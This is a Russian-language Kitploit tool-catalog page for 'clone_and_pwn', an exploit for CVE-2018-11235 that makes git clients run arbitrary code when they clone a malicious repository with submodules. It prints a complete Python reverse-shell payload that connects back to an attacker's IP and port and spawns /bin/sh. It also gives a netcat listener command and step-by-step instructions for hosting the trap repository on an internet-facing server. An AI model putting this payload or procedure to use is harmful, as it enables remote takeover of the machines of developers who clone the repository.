Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
clone_and_pwn — Exploits CVE-2018-11235 | Kitploit
Инструменты/GitHubGitHub/h0k5/clone_and_pwn
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubh0k5/clone_and_pwn

clone_and_pwn

Exploits CVE-2018-11235

Репозиторий
18 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Заголовки

Название эксплойта: Clone and Pwn
Дата: 4 июня 2018 г.
Автор эксплойта: Alejandro Caceres
Сайт разработчика: https://git-scm.com/
Ссылка на ПО: https://git-scm.com/downloads
Версия: произвольный код выполняется на клиентах git в Git до 2.13.7, 2.14.x до 2.14.4, 2.15.x до 2.15.2, 2.16.x до 2.16.4, и 2.17.x до 2.17.1
Протестировано на: Linux: Ubuntu, Mint, MacOSX
CVE: CVE-2018-11235

Эксплойт для CVE-2018-11235. Использование

CVE-2018-11235, названный здесь clone and pwn, создаёт вредоносный git-репозиторий, эксплуатирующий ошибку в git. Когда репозиторий клонируется с флагом --recurse-submodules, произвольный код выполняется на клиентах git в Git до 2.13.7, 2.14.x до 2.14.4, 2.15.x до 2.15.2, 2.16.x до 2.16.4, и 2.17.x до 2.17.1.

Чтобы использовать этот модуль, просто поместите его на сервер с прямым доступом в интернет (например, AWS, digital ocean) и откройте evil.sh. Оно будет выглядеть примерно так:

root@kitploit:~
#!/usr/bin/python

EXTERN_IP="127.0.0.1"
EXTERN_PORT=8080

#reverse shell to IP EXTERN_IP and port EXTERN_PORT
import socket, subprocess, os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((EXTERN_IP, EXTERN_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Установите EXTERN_IP и EXTERN_PORT на IP (внешний) и порт, на который вы хотите получать reverse shell. Reverse shell можно получить с помощью чего-то вроде:

nc -l <EXTERN_IP> EXTERN_PORT например nc -l 193.23.23.32 8080

Или с помощью модуля generic shell от Metasploit. Как только пользователь выполнит команду git clone --recurse-submodules git://<your ip>/repo dest_dir, вы получите reverse shell.

Если у вас возникли проблемы с многократным запуском (или после неудачной попытки), проверьте следующее:

  • Запустите ./clean.sh, обратите внимание, это удалит все данные в /tmp.
  • Проверьте процессы с помощью ps aux | grep git, чтобы убедиться, что gitdaemon не запущен. Убейте все процессы gitdaemon.

Благодарности

Код основан на git patch от @peff (см. файл теста t/t7415-submodule-names.sh).

Соответственно, этот репозиторий опубликован под GNU General Public License версии 2.

Дополнительное исправление для старых версий git предоставлено @atorralba (подробности в этом посте).

Этот скрипт адаптирован из https://github.com/Rogdham/CVE-2018-11235, большая благодарность и уважение

=======

clone_and_pwn

Эксплуатирует CVE-2018-11235

Авторы: @_hyp3ri0n и @mehaase

Скачать инструмент